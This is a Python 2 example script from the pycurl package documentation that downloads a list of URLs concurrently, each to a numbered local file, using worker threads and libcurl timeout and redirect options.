Current File : /usr/share/doc/python-pycurl-7.19.0/examples/retriever.py
#! /usr/bin/env python
# -*- coding: iso-8859-1 -*-
# vi:ts=4:et
# $Id: retriever.py,v 1.19 2005/07/28 11:04:13 mfx Exp $

#
# Usage: python retriever.py <file with URLs to fetch> [<# of
#          concurrent connections>]
#
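# Example invocation (urls.txt is a hypothetical file with one URL
# per line; pass "-" to read the URL list from stdin):
#   python retriever.py urls.txt 20
#   python retriever.py - 5 < urls.txt
#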

import sys, threading, Queue
import pycurl

# We should ignore SIGPIPE when using pycurl.NOSIGNAL - see
# the libcurl tutorial for more info.
try:
    import signal
    signal.signal(signal.SIGPIPE, signal.SIG_IGN)
except (ImportError, AttributeError):
    # Platforms without SIGPIPE (e.g. Windows) raise AttributeError.
    pass


# Get args
num_conn = 10
try:
    if sys.argv[1] == "-":
        urls = sys.stdin.readlines()
    else:
        urls = open(sys.argv[1]).readlines()
    if len(sys.argv) >= 3:
        num_conn = int(sys.argv[2])
except (IndexError, IOError, ValueError):
    print "Usage: %s <file with URLs to fetch> [<# of concurrent connections>]" % sys.argv[0]
    raise SystemExit


# Make a queue with (url, filename) tuples
queue = Queue.Queue()
for url in urls:
    url = url.strip()
    if not url or url[0] == "#":
        continue
    filename = "doc_%03d.dat" % (len(queue.queue) + 1)
    queue.put((url, filename))
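
# A sketch of the expected input file (the hypothetical urls.txt
# above): blank lines and lines starting with "#" are skipped by the
# loop above.
#   http://example.com/index.html
#   # this comment line is ignored
#   http://example.org/data.bin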


# Check args
assert queue.queue, "no URLs given"
num_urls = len(queue.queue)
num_conn = min(num_conn, num_urls)
assert 1 <= num_conn <= 10000, "invalid number of concurrent connections"
print "PycURL %s (compiled against 0x%x)" % (pycurl.version, pycurl.COMPILE_LIBCURL_VERSION_NUM)
print "----- Getting", num_urls, "URLs using", num_conn, "connections -----"


class WorkerThread(threading.Thread):
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue

    def run(self):
        while 1:
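            # Pull URLs until the queue is drained; Queue.Empty
            # signals that this worker can exit.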
            try:
                url, filename = self.queue.get_nowait()
            except Queue.Empty:
                raise SystemExit
            fp = open(filename, "wb")
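            # One Curl handle per transfer: follow up to 5 redirects,
            # allow 30s to connect and 300s total, and stream the
            # response body into fp.  NOSIGNAL is needed when libcurl
            # is used from multiple threads (see the SIGPIPE note
            # above).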
            curl = pycurl.Curl()
            curl.setopt(pycurl.URL, url)
            curl.setopt(pycurl.FOLLOWLOCATION, 1)
            curl.setopt(pycurl.MAXREDIRS, 5)
            curl.setopt(pycurl.CONNECTTIMEOUT, 30)
            curl.setopt(pycurl.TIMEOUT, 300)
            curl.setopt(pycurl.NOSIGNAL, 1)
            curl.setopt(pycurl.WRITEDATA, fp)
            try:
                curl.perform()
            except:
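                # Report the failure but keep this worker alive for
                # the remaining URLs.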
                import traceback
                traceback.print_exc(file=sys.stderr)
                sys.stderr.flush()
            curl.close()
            fp.close()
            sys.stdout.write(".")
            sys.stdout.flush()


# Start a bunch of threads
threads = []
for dummy in range(num_conn):
    t = WorkerThread(queue)
    t.start()
    threads.append(t)


# Wait for all threads to finish
for thread in threads:
    thread.join()
